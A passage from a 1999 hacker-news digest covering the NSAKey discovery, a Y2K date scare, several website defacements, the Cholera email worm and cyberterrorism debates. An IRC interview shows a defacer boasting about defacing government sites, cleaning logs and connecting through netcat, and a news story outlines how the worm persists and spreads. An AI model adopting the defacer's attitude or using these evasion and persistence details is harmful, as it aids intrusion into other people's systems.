pops right out. I don´t know if you´ve seen it, but the screen captures are up on the Web site. Yeah, I remember that. And NSA key. And I kind of focused on it, and I almost fell off my chair. It was like, "what the hell is THAT doing there!" Exactly, right... You start thinking, encrypt Rc4 -- so you kind of know instinctively where in the module you are. 
So, in point of fact, that´s exactly how I came across that. You know, it´s not glamorous, it´s not a particular spot of genius on my part, but it´s true. Well, I´d love to be able to make you out to be a genius and everything... But I guess that plan´s gone. Yeah, well, life´s hard. But anyway, yeah. I was actually kind of worrying about all the reverse engineering things people are e-mailing me about. They keep saying that Microsoft could slam me for reverse engineering it. And I keep yelling at them -- "I´m not reverse engineering it!" Well, I tell you, you know, everyone in the media, everyone outside the technical field in the media, gets something wrong in every story. Well actually one of the ones they got wrong, which I always found funny. It was one of the big networks. Well, Ian Goldberg has been in the news a lot. He´s the current you know, crypto darling boy. Especially with the things he´s been doing. So anyway, they asked me where I went to school. The University of Waterloo, a big crypto place... and he graduated the same year as me. Well, I left it at that... it was kind of a side bar and all. Well, next thing I know, a person in the National Post, one of Canada´s two national newspapers, says I studied computer science at the University of Waterloo. Now, I actually studied biochemistry and mathematics there! Needless to say, my almer mater was not very happy with that. I think I took one computer science course there... and I didn´t do too well either. It was like Fotran or something... Oh God... So, you know, little things like that happen, and they keep growing. And all of a sudden, you know, this is my first experience with the media. I´m having heart palpatations, you know, I´m like, "Oh my God! Oh my God!" Yeah, well, you know, when I deal with them every time I turn around and I watch something on TV which I was interviewed for something... I´m always wondering whether they´re going to make me look like an idiot or something. 
It really depends, I´ve discovered, on the reporter. Some of them take the time to really think about it, what may have been unsaid, what they´re assuming... and others just move and connect the dots as well as they may. And they have to make six column inches. Yeah, it is true with some of them... And I´ve written some nasty letters. Anyway, I want to get back on the track... I don´t want to take too much time on this. Well it was an interesting segue. Yeah, you´re right. Well, that´s how I found it. In terms of actual time now, to find out what was in there. It didn´t take a whole lot. One of the things in the public Crypto API documentation is that you have to look for the strings of the public and private keys prefixed by the headers "RSA1" and "RSA2." And that should mean something to anyone who´s ever used encryption toolkits for RSA. And, aah, right after that... One of the debugging... like on the screenshots, you can see "BSave Encrypt Public." And all of a sudden I´m like, "Aaah, BSave. Yeeah..." Yeah, RSA Data Security BSave Toolkit... Aaah... Yup. So, no brainer you know. After that it doesn´t take... You almost find this stuff without looking for it. Yeah, so you can even do a search... It doesn´t even take that... I mean if you´re actually looking for it. Yeah. In terms of, in terms of figuring out what was going on in I´d say milliseconds. It´s fully explained on one screen -- first check Key and then check _NSAKey. I mean, that´s one page of 386 Assembly Language. So you know, that was about it. Yeah. So when you actually found this, what were you thinking? Was it like, "Oh here´s a backdoor..." "Here´s..." You know, what? What were my first thoughts? Holy shit -- NSA stuck right in the middle... First of all, I thought it was incredibly stupid for someone to put the letters "NSA" right into the middle of a crypto module. Yeah, of course... Automatically, when anyone sees that, red flags go right up. Oh yeah, your red flags go way up.
Now, I did not initially think that it was some sort of back door. You have to be careful with that term -- everyone has their different definitions of back doors. Yeah... But in terms of, could this be in some way connected with the NSA getting into your machine... And again, I´ll define that later on. I didn´t think of it immediately because it just seemed too stupid. To be brutally honest. Once I did... I had quite a while to think about this. I first found this in early August and I had a couple weeks to think about it before Crypto `99 in Santa Barbara. And even afterwards I just discussed it with people there and had another couple weeks to think about it before I put it on the Web site. And I started shifting through... I mean, "why the hell would that be there?" Now, I knew there would be two keys... Well, I tell you, I´ve done a lot of speaking with Microsoft on this subject. And they refuse to tell anyone even what that second key is there for. Well they kind of make rumbling noises about it being a backup key. Well they haven´t even said that... Yeah, they did in the Washington Post. They did? Okay I missed that. And the CCC, the Chaos Computer Club, they called me this afternoon and told me that in fact Microsoft Germany, Microsoft USA and Microsoft one other country had issued relatively contradictory contrary press releases... Well I´m not surprised. Well, you know, any large company... Yeah, absolutely. Anyway, the way events have progressed in the past year... Ever since Crypto API came out Microsoft has said, "look, before you load a CSP you have to get a digital signature from us." So you know there has to be a public signature somewhere in there. Well yeah, there kind of... there has to be. Oh no, no. There absolutely has to be -- if they´re going to use digital signatures there has to be. Oh, I meant in the sense that they´d have to get these things signed. So anyway, last August Cipher and the S in RSA...
They were using maximum entry principles to look for embedded keys in executables. They were saying look, this is not a safe place to store your keys. You know, all root keys in a PKI are stuck in software somewhere. And if they´re there they can be found and changed. So they had run scanners over Microsoft programs and discovered that Crypto API there wasn´t one key -- there were two keys. And Microsoft did the typical "no comment, it´s our key... We know it´s there," you know... da da da... No comment. And the issue kind of died down. If they´re not going to tell you you just don´t know. Yeah, and there´s no way you could find out. So I did have some background, you know, rumbling somewhere in the top of my head and I did a little research later on. So it was known there were two keys. So along comes these labels, "Key" and "_NSAKey." Well, what I obviously did... First I fell off my chair, you know, I was shocked... "Holy Toledo! What´s that doing there?" You start running through reasons in your head -- well, why would that be there, or why could that be there? And I know Ian Goldberg did this too, with Zero Knowledge. The complete real explanation for it is that it´s a way for the NSA -- Or the only explanation that makes sense... The only explanation that covers the bases, or at least more consistently than other explanations... Is that that key is in some way is in the influence or control of the NSA. Well, of course, in crypto speak NSA can only mean one thing -- the National Security Agency. There´s two analogies I use depending on the reporter... The first is, well, the more conservative approach is: If you´re a software developer in the computer field and you´re talking about buying some IBM -- you´re not going to pretend you don´t know what IBM I´m talking about. And the other way of saying it is, "at the height of the cold war, can you imagine trying to convince the Russians that ICBM stands for `I Can Be very Mellow.´" It´s just not going to work.
Had it been anywhere but the crypto module then for sure NSA could have stood for anything. But stuck in the middle of crypto verification, blah blah blah, it´s inconceivable that it could be anything else. Now, again, you can´t claim ownership, or who controls a key... you could split those hairs a thousand days from tomorrow. But -- I think it´s almost inarguable that the NSA had some input in that key. Whether that is a lot of input or a little input, whether it´s malicious...

(to be continued)

@HWA

23.0 9999 - Hey! That's today!
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Code Kid
A day that had the potential to be as bad as Y2K has come and gone with barely a whimper. 9999 was once also used as an end of file character on some systems and it was feared that today's date may trigger unexpected results.

Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,91073-144193-1007662-0,00.html

String of nines in date prompts Year 2000 dress rehearsal

Copyright © 1999 Nando Media
Copyright © 1999 Associated Press

By WILLIAM McCALL

VANCOUVER, Wash. (September 9, 1999 7:10 a.m. EDT http://www.nandotimes.com) - It comes only once a century, and the day that lines up four "9s" arrived just in time to test whether the nation will have electric power when the millennium adds three "0s" to the calendar. Utilities used the occasion for a nationwide drill, coordinated by the North American Electric Reliability Council, to test preparedness plans and backup systems for Jan. 1, 2000. U.S. Energy Secretary Bill Richardson personally supervised a test of the computers controlling the national power grid as the clock struck midnight for Sept. 9, 1999, or "9-9-99" - an old computer command to end a program. The tests were designed to simulate electric outages in different parts of the nation, test communications under those circumstances and determine how utilities and agencies would respond.
The results of this latest national Y2K readiness test of the power grid came up with another pair of "9s" - as in 99 percent ready for the millennium, Richardson said. "But there's still that 1 percent," Richardson said from the Bonneville Power Administration, a federal agency that transmits power throughout the Northwest. "And that 1 percent covers a lot of consumers." Richardson said he was concerned that eight major utilities and 16 smaller municipal utilities or power cooperatives were not fully Y2K ready. There are about 3,000 utilities in North America. "They are close, but close is not good enough," Richardson said. "I won't rest until all consumers can be assured that utilities have adequately prepared for a smooth rollover." The fear has been that any problems on Sept. 9 would be a precursor of the so-called Y2K or millennium bug - when computers could malfunction as they misread the year 2000 as 1900. Early computer programmers often used the numerical notation for Sept. 9, 1999, as the date representing infinity. They were sure the databases or programs would be replaced long before Thursday rolled around. The island of Guam - on the other side of the international dateline - was the first American territory to deal with the potential Sept. 9 problem. "It was a non-event for Guam," government spokeswoman Ginger Cruz said after officials triple-checked computer systems. "We can only hope that Y2K will be this uneventful." If any problems did develop, plenty of computer experts were on hand in Pennsylvania. There were 75 extra computer specialists and other staffers for PECO Energy Co., said spokesman Michael Wood. "This was really the first live test of the first vulnerable date," Wood said Thursday. "We believe this exercise reinforces our confidence - and hopefully it should increase the public's confidence - in electric and utility services come the new year." The North Carolina Electric Membership Corp. 
released a statement shortly after midnight saying officials there were pleased with early results of the test. "This drill was one of the many efforts we are making to be ready for the Y2K event," said Chuck Terrill, chief executive officer of the NCEMC, which coordinated the state's 27 electric cooperatives. In Atlanta, technicians at Georgia Power were having a slow morning, according to utility spokeswoman Carol Boatright. "We're simply monitoring everything, and everything is going well," she said. Richardson said he has directed the Energy Department to conduct an additional 20 reviews of randomly selected electric utilities over the next two months. "It is critically important that by October or November that we be 100 percent compliant," he said. "We can't just wait until three days before millennium starts to be compliant." Meanwhile, some Americans seemed unconcerned - or even unaware - of the high powered tests and fearful computer watching. "I hadn't heard about 9-9-99," said James Lawrie, 29, a jewelry vendor in downtown Phoenix. "I hope it doesn't affect my checking account." Phoenix police Sgt. Michael Sheahan said Thursday's date didn't concern him at all. "Four nines?," he asked. "That's a good poker hand in 5-card stud."

@HWA

24.0 US Chinese Embassy Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by McIntyre
A group calling itself the 'Level Seven Crew' defaced the web page of US Chinese Embassy on Tuesday.

CNN
http://cnn.com/TECH/computing/9909/07/embassy.hack/index.html

CNN- Second Story
http://cnn.com/TECH/computing/9909/08/hack.folo/index.html

OSALL - Interview with Vent from Level Seven Crew
http://www.aviary-mag.com/News/Vent_Speaks/vent_speaks.html

HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html

CNN #1;

Hackers put racist, anti-government slogans on embassy site

September 7, 1999
Web posted at: 1:07 p.m. EDT (1707 GMT)

(CNN) -- Hackers hit a Web site for the U.S. embassy in China Tuesday, replacing its home page with racist and anti-government statements. A group named Level Seven Crew claimed responsibility on the page for the prank, making references to bombing China and a "war of skill" with hackers started by the FBI. The State Department was not available for immediate comment, and Level Seven did not respond to e-mail. The Attrition.org Web site, which monitors and mirrors hacked sites, shows that Level Seven has hacked more than two dozen Web sites this year, including those belonging to the NASA Goddard Space Flight Center, Atlanta Braves, Linux headquarters, Sheraton Hotels, Beyond Software and Santa's Official Page.

-=-

Embassy site hackers aimed to show its vulnerability

In this story:
Group linked to Pentagon hacker
Racist comments a 'mistake'

(CNN) -- Hackers who hit a Web site for the U.S. Embassy in China are part of a 13-member group that has claimed responsibility for altering more than two dozen Web sites this year and chooses targets to show up their security flaws. The group, called Level Seven Crew, claimed responsibility Tuesday for replacing the Embassy page so it displayed racist comments and made references to bombing China and a "war of skill" started by the FBI. The State Department failed to return a request for comment. The site was restored by Wednesday. "We were bored, so we decided to deface it and prove a point that the site was insecure," said 'vent,' a Level Seven member who responded to a message sent to an e-mail address on the hacked site. "We patched it up and after we were all through, we defaced it," vent said. "We didn't harm the box though because we aren't a malicious group." The Level Seven Crew's Web site claims the group has hacked sites put up by the NASA Goddard Space Flight Center, Atlanta Braves, Linux headquarters, Sheraton Hotels, Beyond Software and Santa's Official Page.
Group linked to Pentagon hacker

Level Seven started several years ago and lost five members due to recent FBI raids of the group Global Hell, some of whose members also worked with Level Seven, vent wrote. The Justice Department announced last month that Chad Davis, 19, a founder of Global Hell, was arrested and charged in a federal complaint with hacking into the U.S. Army computer and "maliciously" interfering with the communications system. The complaint said he gained illegal access to an Army Web page and modified the contents. Davis, of Green Bay, Wisconsin, also was accused of gaining access to an unclassified Army network and removing and modifying its computer files to prevent detection. Davis's arrest is part of a nationwide investigation of Global Hell that has been under way for several months and has turned up more than a dozen other suspects, according to the Chicago Sun-Times. Although investigators suggest that more arrests may be coming, Davis' apprehension shows the difficulty of tracking down computer criminals -- even those, like Davis, who are relatively brazen, according to federal law enforcement officials and computer security experts.

Racist comments a 'mistake'

As for Level Seven, just one of dozens of loose-knit groups of hackers worldwide, some of its members work as security consultants, vent wrote. This seems to be typical of hackers -- many work in the information technology industry. Racist comments posted on the hacked embassy site were a "mistake," vent wrote. Some members of Level Seven are Chinese and the words were meant as an internal joke that inadvertently was posted for the hack. The FBI actively searches for hackers, arriving at their homes with search warrants and sometimes carting away their computers -- activities Level Seven calls on some of its hacked pages a "war." But Level 7's members are "good hackers," vent wrote, because "Level Seven secures the box without touching the files on it."
The group knows that hacking is wrong, vent wrote, but will continue to do so to illustrate security lapses. "We will succeed. We will thrive," vent wrote. The Associated Press contributed to this report.

-=-

OSALL Interview;

Vent, Head of L7 Speaks
9/8/99
Mike Hudack
Editor-in-Chief

In accordance with OSAll´s interview policy the following interview is offered verbatim and unedited in any way. With that in mind, however, I´ve decided to add a small amount of commentary to the beginning of this interview: Defacements take place daily -- and the major ones reach the mainstream media. The media, by giving attention to these defacers (usually script kiddies) is helping to encourage this action. The media, on the other hand, does have an obligation to report the news -- and the defacement of a site such as the United States Chinese Embassy is news. In the following interview Vent, the head of L7, tells us that he feels he´s addicted to defacing. In addition he admits -- for the first time -- that he´s a script kiddie.

Session Start: Wed Sep 08 20:05:51 1999
[20:05] cnn interviewed us on the us embassy hack, and msnbc might later tonight.
[20:06] sweet
[20:06] mirrored at attrition, i presume?
[20:07] yea, did it last night at 2:30am, www.usembassy-china.gov
[20:07] and www.fgdc.gov
[20:07] for the attention, right?
[20:08] nah, to get raided.
[20:08] heh
[20:08] heh.. i was stoned
[20:08] and bored, and needed some fun
[20:08] heh
[20:08] smart
[20:09] make a big story bout us now on aviary-mag ;c]
[20:09] heh
[20:09] if im gunna get raided might as well get media attention before i do
[20:09] ;c\
[20:09] yeah
[20:09] hey, you didn't give me a shout-out!
[20:09] :-)
[20:09] i cleaned logs and shit up, they prolly cant trace it back to me
[20:09] i went through a shell and shit
[20:10] make a big story bout us now on aviary-mag ;c]
[20:10] rofl
[20:10] i tell you what... let me print this conversation :-)
[20:10] hah
[20:10] ok ;c]
[20:10] good
[20:11] so what vuls did you use?
[20:11] well if ur logging the convo.. "HI MOM!"
[20:11] yeah :-)
[20:11] what exploits?
[20:11] we logged in wif netcat.
[20:11] heh
[20:12] heh... can anyone say "script kiddies?"
[20:12] yea yea, im a script kiddie, but a experianced one, me and my buddies are drinking atm... to celebrate some shit ;c]
[20:12] heh
[20:12] "script kiddie" is just a nickname
[20:12] i'm saying heh too much... and i didn't prepare for this, so i don't have structured questions for ya :-)
[20:13] did you use the same methods on both servers?
[20:13] ppl call me "greaser" .. cause i got madd phat hair
[20:13]
[20:13] but that dont mean anything, i know alot, and thats all that counts.
[20:13] ^
[20:13] answer the question, kiddie
[20:13] no, the fgdc.gov had a backdoor flake placed .. before he got raided
[20:14] we havent seen flake in like 2 months.
[20:14] you waited all this time to deface it?
[20:14] yea..
[20:14] why? so you could have two big defacements for the media?
[20:14] shows how the admin actually looks on the box.
[20:15] come on... are you actually doing this for the admins -- or for the attention?
[20:15] no, i was looking at my little list .. and did eny meeany miny moe
[20:15] heh, i dont do alot of shit fort the attention
[20:15] cnn mailed me first, and shit
[20:15] yeah
[20:15] who interviewed you from cnn?
[20:15] i dont care bout media, but if they want it.. i gib it
[20:16] Robin Lloyd i think
[20:16] gonna keep defacing sites?
[20:16] yea, why not. ill deface, so will foil and everyone else in the group
[20:16] why? if all you really want to do is show that the admins are idiots... why not e-mail their bosses with examples of the problems?
[20:17] heh, ive answered this like 5 times today.. because, its fun, to embarras them..
[20:17] i'm sure you have ;-)
[20:17] hacking is a sport sorta, a hobby.. an addiction if you will.
[20:17] you really consider it an addiction?
[20:17] yes, im at my computer almost all the time.
[20:18] but i sometimes go to bars and drink
[20:18] so are a lot of people -- who don't deface websites
[20:18] then come home and hack while piss drunk
[20:18] for me its different, i get a "high" and adrenalyne rush from defacing and hacking
[20:18] what about sports? :-)))
[20:18] so does other l7 members, like skillet, bass, and motivez
[20:19] think they're addicted?
[20:19] hacking is a sport, in the way: you deface, fbi gotta try to get you
[20:19] like a football game
[20:19] heh
[20:19] all the L7 members are computer addicts.. otherwize we wouldnt be together several years.
[20:19] what'll happen to you if bugtraq and the rest get shut down? :-)
[20:20] some members script thier own sploits, ive been to bugtraq like 4 times this year.
[20:21] yeah
[20:21] anyway, i've gotta run... i have an interview with the cryptonym guy in five minutes
[20:21] anything else you'd like to add before I get going?
[20:21] yea .. " Level Seven will not die, we will suceed, we will thrive "
[20:21] thought id add that
[20:21] now, back to toking up
[20:21] ;c]
[20:22] --EOF
[20:22] ;c]
[20:22] well, thanks man
[20:22] i'll have this published tomorrow...
[20:22] and with a little commentary ;-)
[20:22] of?
[20:23] just a little about how defacement isn't the solution
[20:23] i hope you don't mind

@HWA

25.0 Scottish Executive Site Defaced - After Warning
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by info
According to the BBC the Scottish Government's Website has been defaced. The site was down for maintenance yesterday evening and is the latest in a series of embarrassing security flaws in the site. The Saga of the site started over 1 month ago when the Conference DNS 'outed' the site for poor security.
Secondary DNS Con
http://www.dnscon.org

BBC
http://news.bbc.co.uk/hi/english/uk/scotland/newsid_441000/441675.stm

Screen shot of cracked page - provided by Attrition.org
http://www.attrition.org/mirror/attrition/1999/09/08/www.scotland.gov.uk/www.scotland.gov.uk.gif

HNN Archive for September 7, 1999 - Security Tightened on Scottish Executive Site
http://www.hackernews.com/arch.html?090799#6

HNN Archive for August 17, 1999 - DNS Con Claims Lax Security of Government Site
http://www.hackernews.com/arch.html?081799

Secondary DNS Con - Original Press Release
http://www.hackernews.com/press/dnscon.html

BBC;

UK: Scotland

Hackers hit ministers' Website again

The Scottish Executive Website was found to be insecure

Computer hackers have again breached security surrounding the Scottish Executive's Website. The intrusion comes less than a week after it emerged that security measures had been tightened following a warning that the site was open to attack by hackers. The opening page, containing a foreword from First Minister Donald Dewar, was accessed on Wednesday morning and bogus text inserted. Throughout the afternoon, the site was unavailable and the message "currently being updated" was posted on the home page. A Scottish Executive spokesman said urgent talks were taking place with the site designers to find out the measures put in place since the original warning had been breached. He stressed that the site did not contain sensitive information.

Campaign group

Security was tightened after a warning it was open to attack from hackers, terrorists and other criminals. The administration's site was targeted by a group campaigning for greater precautions against information warfare. The group said the security lapses meant hackers could have gained access and theoretically declared Scottish independence. DNScon is a computer security conference which claims hackers, police officers and lawyers are among its members.
The group said the biggest loophole in the Scottish Executive's site lay open for months and remained open for several days after First Minister Donald Dewar was alerted to the problem.

'False information'

DNScon said hackers could have planted false information on the website, such as the results of a reshuffle of the Scottish cabinet, declaring independence, or manipulating the stock market by falsely changing taxes on North Sea oil or whisky. The Scottish Executive said there was "a potential security problem" which was discovered two weeks ago and the company which manages the site was informed. A spokeswoman said a number of countermeasures were immediately taken. Members of DNScon are normally publicity shy but one representative, known only as 'Mark', said the Scottish Executive's website failed to keep up to date with the latest security measures. He said: "The Scottish Executive site was over a year out of date when it comes to these software patches and fixes. "So the problems were known about in the computer industry for over a year and solved for over a year but they just had not got round, through their policies and procedures, to applying them.

'Simple addition'

"The giveaway was that by typing a simple addition to a web page address you could read code that you as a normal user of the website should not have been able to see." The campaigners said the UK was not taking the dangers of so-called Infowar attacks seriously enough. The group likened hacking processes to the Cold War and, in painting a doomsday scenario said InfoWar could mean anything from missile attacks on enemy radar and telecom centres, to the creation of computer viruses. Disinformation and spin doctoring have also been seen as constituting InfoWar. The end aim of all these activities, the group said, is to win publicity in the same way that terrorist bombs do.
@HWA

26.0 Cholera Outbreak Expected
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by AlienPlague
A new Worm/Virus threat, named Cholera, may soon begin spreading throughout the net but it hasn't yet been found in the wild. Cholera is similar to Worm.ExploreZip in that it will automatically send itself to any e-mail address it finds. The worm includes a payload of the W32/CTX virus.

Infoworld
http://www.infoworld.com/cgi-bin/displayStory.pl?99098.encholera.htm

Warnings go out about Cholera worm/virus threat

By Matthew Nelson
InfoWorld Electric
Posted at 1:47 PM PT, Sep 8, 1999

A new combined worm and virus threat, called Cholera, has been posted to a hacker's Web site and has anti-virus vendors scrambling to provide protection before an epidemic spreads akin to Melissa and Worm.ExploreZip. Computer Associates has found Cholera posted to a hacker site in Germany, and due to the potential danger inherent in the worm/virus, is warning users not to accept suspicious e-mail attachments. The worm/virus is currently listed as a medium threat, as it has not been found "in the wild" and infecting user systems, but will automatically be upgraded to a high threat as soon as it is, according to the company. "We're calling it a moderate alert. But once it gets in the wild we will call it a high alert, because of its ability to spread," said Narender Mangalam, product manager for anti-virus at Computer Associates. Cholera is similar to Worm.ExploreZip as it unleashes a worm-style attack that will automatically send itself to any e-mail address it finds on an e-mail system, and therefore carries the potential to clog and shut down e-mail servers. Cholera is also not platform-dependent, and can operate off of any e-mail system, according to Mangalam. Cholera also includes a virus aspect, as it will drop a virus file, W32/CTX, when it infects a new machine. At this time, Computer Associates is still investigating what payload, if any, the virus will deliver.

"We're not sure what virus does as of now," said Mangalam. Currently Cholera will send itself to a recipient with a "smiley" face in the text and an attachment named Setup.exe that looks like a self-extracting setup program. The icon of this attachment looks like a standard Windows install program, but the color is off. The worm goes resident when the infected system is rebooted. Once activated, the worm installs itself by adding keys to WIN.INI on Win9x and registry on WinNT. The worm will also try to copy itself to any shared drives to which the user is currently connected. Then it proceeds to infect executables in the directory from where it is launched with a virus named W32/CTX. When users open the attachment it displays a message that reads, "Cannot open file: it does not appear to be a valid archive. If you downloaded this file, try downloading the file again." Invisible to the user, the worm will turn into an auto-start application by writing a RUN entry to the Win.ini file (Windows 9x) or to the registry (Windows NT). After sending itself out the worm deletes itself from the system, CA officials said. Although no reports of users being infected have been received by anti-virus vendors, the potential for infection and the possibility that other virus writers will copy and alter the core capabilities of Cholera for "copy-cat" viruses, has companies on alert. "It's sort of a dual thing because of the virus and worm aspect, so it's sort of screaming, 'Build a variant of me,' " said Mangalam. Computer Associates intends to provide an update to its anti-virus systems and recommends users contact whatever anti-virus vendors they utilize. Computer Associates International, in Islandia, NY., is at www.cai.com. Matthew Nelson is an InfoWorld senior writer.

@HWA

27.0 Web Email Vulnerable?
~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by frost_frozen
Are computer users putting corporate data at risk?
In light of the recent HotMail hole some companies have started to block free email services from their corporate networks. Some have gone so far to as to prevent email forwarding and web access to such sites as Hotmail, Yahoo Mail, or Excite Mail. CNN http://cnn.com/TECH/computing/9909/08/email.risk.idg/index.html Hotmail hack shows risks of Web e-mail September 8, 1999 Web posted at: 12:54 p.m. EDT (1654 GMT) by Carolyn Duffy Marsan From... (IDG) -- E-mail administrators are clamping down on users who send and forward messages to free Web-based e-mail services, such as Microsoft's Hotmail or Yahoo Mail. The new policies are designed to prevent exposure to e-mail security breaches, such as last week's hack of Hotmail, one of the worst on record. Some administrators are blocking end users from forwarding messages to Web-based e-mail services, while others are filtering e-mail messages headed to those sites. Companies that don't have policies about Web-based e-mail still expect users to know better than to put corporate data at risk. Attorneys at Greenebaum, Doll and McDonald, a Louisville, Ky., firm, are allowed to forward e-mail to Web-based accounts. "But I hope they're not doing that," says Mandi Turner, who manages the firm's network services. "If they forwarded something inappropriate, it could be malpractice." Turner recently installed TenFour's TFS Secure Messaging-Server software for e-mail virus checking and encryption. She plans to begin using the software's e-mail content filtering soon. "We'll be looking for Hotmail addresses," she says. At the other end of the spectrum is Westinghouse's Anniston, Ala., plant, which blocks all messages to Hotmail, America Online and other Internet e-mail services. "We just started filtering out the Internet e-mail sites about two months ago," says LAN manager Steve Sanders. 
He uses Elron Software's CommandView Internet Manager to search outgoing e-mail for key words such as "free mail" and "MSN," and then blocks those destinations.

The security risks of Web-based e-mail came to the forefront last week when a design flaw in Hotmail was exploited by hackers. The hackers set up Web sites that allowed anyone to open a Hotmail user's account without a password, read or delete that person's messages or send messages under that person's name. Hotmail users were exposed to the security breach for hours before Microsoft shut down and fixed the service.

The most popular free Web-based e-mail service, Hotmail has more than 40 million e-mail accounts. Hotmail has become the preferred alternative e-mail address for corporate America. Whether it's for job hunting, sending off-color jokes, distributing the football pool or chatting with family members, Hotmail is where executives send and receive the e-mail messages they don't want seen at work.

What makes Hotmail so popular is that messages can be easily accessed over the Internet from the office, home or on the road.

"Hotmail is used by all of the executives who have grown tired of roaming software and firewalls. When they're travelling, they just forward everything to a Hotmail account so they can go to an Internet cafe or a friend's computer and access their e-mail," says Eric Arnum, a consultant with e-mail outsourcer United Messaging. "E-mail administrators need to recognize that as a giant gaping hole in their security."

Hotmail also has some legitimate uses in the enterprise: backup and testing corporate e-mail systems and serving as a spam repository, for example.

"I use my Hotmail account for spam. I redirect it to that account," says Dale Seavey, senior manager of the Global Strategic Application Technology Group at Cisco.

"We use Hotmail to test our Internet connections," says David Byrkit, e-mail administrator for ITT Avionics in Clifton, N.J. "Almost all of us in the IT area keep Hotmail accounts in case we're called upon to see if the connectivity is working."

The challenge for e-mail administrators is setting up policies that allow benign uses of Web-based e-mail services while protecting companies from exposure through these nonsecure sites.

Entertainment giant 20th Century Fox has reached a compromise by allowing traffic to Web-based e-mail services but monitoring that traffic with content-filtering software.

"We see a tremendous amount of traffic going across the network to Hotmail, AOL and Yahoo," says Jeff Uslan, manager of information protection at the film studio. He uses Elron Software's CommandView Internet Manager to search outgoing and incoming e-mail for words that might indicate proprietary or inappropriate content.

"We don't want information sent out about our latest movie or our latest star being signed," Uslan says. "We have to protect our intellectual property."

Meanwhile, ITT Avionics keeps all its sensitive e-mail on a classified network that has no connection to the Internet. All other e-mail can be sent out over the Internet without restriction, Byrkit says.

"We haven't been terribly concerned about any security issues with respect to using Hotmail or any other ISP-based mail system," Byrkit says. "We have a lot of mail that has to go to the Internet. We have to be very careful about restricting that in any way."

Others, however, are just saying no.

"We get an occasional request from our users to forward e-mail to Hotmail," says Dale Cybela, a senior consultant with eFunds, a Milwaukee-based provider of electronic payment services. "We tell them, 'Sorry, we already provide facilities for people to get e-mail while on the road.'"

@HWA

28.0 Cyber Terrorism - US Biggest Threat
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Code Kid

Rep.
Curt Weldon, R-Pa., of the House Armed Services Committee, while speaking at InfoWar Con, placed "cyberterrorism" at the top of his list of modern threats to the American way of life. He placed this threat above missile proliferation and weapons of mass destruction.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2330904,00.html

--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Info war or electronic saber rattling?
By Kevin Poulsen, ZDNN
September 8, 1999 6:01 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2330904,00.html

WASHINGTON, D.C. -- The threat of attacks on civilian and government computer networks by rogue nations and terrorist groups is growing as the United States becomes increasingly wired, defense officials and a U.S. Congressman said Wednesday.

Speaking at the InfowarCon conference to a crowd of uniformed military personnel, corporate IT managers, computer security consultants and at least one screenwriter, Rep. Curt Weldon, R-Pa., of the House Armed Services Committee placed "cyberterrorism" at the top of his list of modern threats to the American way of life.

"In my opinion, neither missile proliferation nor weapons of mass destruction are as serious as the threat you are here to discuss," Weldon said.

Weldon warned that civilian infrastructure, including air traffic control systems, communications networks and computer controlled subways could all be vulnerable from cyberspace.

"If I want to wreak havoc on a society that, in some cases, has become complacent, I am going to attack your quality of life," Weldon said.

By way of example, Weldon said he was privy to a computer intrusion three years ago at a New York hospital, in which the perpetrator "was able to change all the patients' blood types."
When asked by ZDNN whether the intruder had been apprehended and prosecuted, Weldon said he wasn't certain. He declined to identify the hospital.

Key to war fighting

"It's clear that information superiority is the key to 21st Century war fighting," said Major General John Campbell, who heads the Defense Department's Joint Task Force on Computer Network Defense (JTF).

The JTF was launched last year after a series of attacks by a group of three teen-age hackers on Defense Department Internet systems alarmed Pentagon officials who feared they may be facing a genuine cyberwar as they prepared for operations in Iraq.

The intrusions, Campbell said, underscored the need for a central computer security authority within the DOD. "Somebody has to be in charge," said Campbell.

Campbell said that although the Pentagon's classified network is isolated, its unclassified network, NIPRNET, is connected to the Internet through official and unofficial gateways, and is increasingly relied upon in military operations.

"We've had 400 percent growth in traffic since 1996," said Campbell. "NIPRNET has become the network of choice for war fighters."

The JTF maintains a 24-hour operations center intended to serve as an early warning system for attacks on Pentagon systems. But it's rogue nations, not teen-age hackers, that the center is watching for.

"If they're defacing a Web page, there's not much of an effect on our ability to support troops," said Campbell. "Of course, we take the most serious view until we can prove it's a hacker" -- a process that generally involves asking the FBI to track and arrest the culprit.

Electronic Pearl Harbor?

Not everyone is convinced that America is facing an electronic Pearl Harbor, though.

"There's very little evidence that information warfare poses any direct threat, as do, for example, bombs and guns and tanks," said Marc Rotenberg, director of the Electronic Privacy Information Center. "Proposals to combat it invariably lead to greater authority and funding for military agencies and a reduction of freedom and privacy for individuals."

Rotenberg said computer security problems should be addressed, "but it shouldn't be done in such a way as to expand military authority or to reduce the openness of research."

@HWA

29.0 Philippine Gov Scared of Cyber Terrorists
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Weld Pond

The Philippine government is looking to beef up its online security of government systems. This adverticle also boasts Network Associates as some Internet savior. Interesting quote: "90 percent of computer systems in the world are attacked and as much as 70 percent of these attacks result in financial losses, with the average loss in the US at US$84,000". Where do they get these numbers?

Computer Currents
http://www.currents.net/newstoday/99/09/08/news12.html

Daily News
Govt Addresses Cyber Terrorist Threats
By Joel D Pinaroc, Metropolitan Computer Times.
September 08, 1999

The Philippine government is taking cyber terrorism seriously and is talking with global security "solutions" vendors about possible network security projects for its information technology (IT) initiatives.

This was affirmed in a recent consultative meeting between the National Security Council (NSC), the lead agency tasked to address Internet-borne threats and other issues on national security, and software vendor Network Associates, Inc. [NASDAQ:NETA].

Cyber terrorism is the act of computer systems intrusion with malicious and often destructive intent.

Dean Mansfield, NAI vice president for Asia Pacific, said in an interview, that the Philippine government has expressed "high interest" in some of the company's latest security "solutions." He declined, however, to give further details.

